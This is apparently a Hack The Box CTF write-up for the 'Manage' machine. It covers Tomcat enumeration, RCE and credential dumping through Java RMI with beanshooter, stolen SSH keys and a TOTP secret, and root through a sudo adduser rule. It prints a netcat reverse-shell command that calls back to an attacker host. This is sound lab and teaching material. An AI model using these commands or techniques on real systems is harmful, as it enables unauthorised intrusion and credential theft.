Post

HTB Manage CTF Writeup

Tomcat's management interface is restricted to localhost, but Java RMI on port 2222 allows credential dumping and RCE via beanshooter. An unprotected backup directory leaks SSH keys and a TOTP secret for lateral movement. A restricted sudo rule permitting adduser is abused by creating a user named admin, which Ubuntu automatically adds to the sudo group.

HTB Manage CTF Writeup

HTB Manage CTF

Web Server Enumeration

Port 8080 is open with apache tomcat

image.webp

Specifically on version 10.1.19.

Trying to access the management interface leads to nothing. Doesn’t even ask for credentials, saying that only machines connected from the same host running the tomcat application are able to login.

Java RMI

Port 2222 is also open in the machine, and it’s running Java RMI

Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they’re on different physical machines. RMI provides a mechanism for Java-based distributed computing.

It’s possible to not only dump the credentials for the tomcat application but also achieve remote command execution using the “beanshooter” tool pretty easily.

Reference: https://swisskyrepo.github.io/PayloadsAllTheThings/Java%20RMI/#rce-using-beanshooter

More specifically, to get RCE:

1
beanshooter standard 172.17.0.2 2222 exec 'nc 172.17.0.1 4444 -e ash'  # change reverse shell method

To dump credentials and more info:

1
beanshooter enum 172.17.0.2 2222

Horizontal Privilege Escalation

The useradmin user had an unprotected backup folder in their home folder, which allowed me to save a copy to my machine and obtain sensitive information about that user, like SSH private keys and two factor authentication secret token.

I used this information to log in as “useradmin” to the machine via ssh.

Vertical Privilege Escalation

User “useradmin” has sudo permissions to run “adduser ". It's pretty restricted, but we're on a Ubuntu server. What that means is that we only needed to create a user named "admin" and the system would automatically add that user to the "sudo" group.

This post is licensed under CC BY 4.0 by the author.